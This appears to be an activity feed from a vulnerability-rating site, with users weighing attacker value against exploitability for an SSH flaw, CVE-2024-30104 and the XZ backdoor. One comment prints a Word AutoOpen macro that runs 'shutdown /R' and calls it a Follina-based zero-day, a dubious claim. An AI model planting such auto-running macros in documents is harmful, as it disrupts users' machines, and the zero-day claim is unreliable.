Activity Feed

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very Low
Technical Analysis

Doesn’t lend itself to an attackers needs. Takes a very long time to exploit, only works on a specific architecture (32bit), easily detected/blocked as malicious and requires access to a protocol (ssh) that is commonly hardened with access control lists.

1

What @noraj said! If successfully exploited, it almost likely gives root access to the system which is about as good as it gets for an attacker. But the effort required to do so is significant, making the chances of successful exploitation very low. So from a risk perspective (risk = impact * likelihood), where the impact (attacker value) is incredibly high, but the likelihood (exploitability) is very low, putting it at about medium risk.

2

@cschie822_comcast it depends if one means the attacker value in case of successful exploitation (which is very high here) or if it is the global attacker value taking every other metrics into account such as the very difficult exploitability (the value is very low). So it depends if it is contextualized or not.

2

interesting… your comments and your attacker value ratings don’t seem to line up.

2
Ratings
Technical Analysis

CVE-2024-30104

The problem is still in the “docx” files this vulnerability is a 0 day based on the Follina exploit. The Microsoft company still doesn’t want to understand, that they MUST remove macros options from the 365 Office and their offline app. In this video, you will see an example of this, how some users can be trickery to open the malicious file that is sent to them by the attacker. After execution of the file, the thing will be very bad for the users who execute it on their computer. It depends of the scenario.

The exploit:

Sub AutoOpen()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "shutdown /R"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
  • Enjoy watching

Source:

link

PoC:

video

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very Low
Technical Analysis

While this vulnerability is interesting, and it certainly has the potential for immense damage and harm, the reality is far more nuanced. The difficulty in exploiting this vulnerability is significant, and will likely have to generate a lot of noise from the attacker. It takes a matter of hours (the quickest to date has been around 4 hours under lab conditions) to successfully exploit, which a lot of traffic and noise that for the most part will not go unnoticed if an organisation has the appropriate monitoring in place.

In addition, this is a not vulnerable on numerous LTS base Operating Systems such as:

2

Exactly, yet another vulnerability that is marketized as critical and requires urgent attention while it will probably never be exploited outside very niche cases.

But as for XZ backdoor, no one now how it will evolve so it’s still better to patch.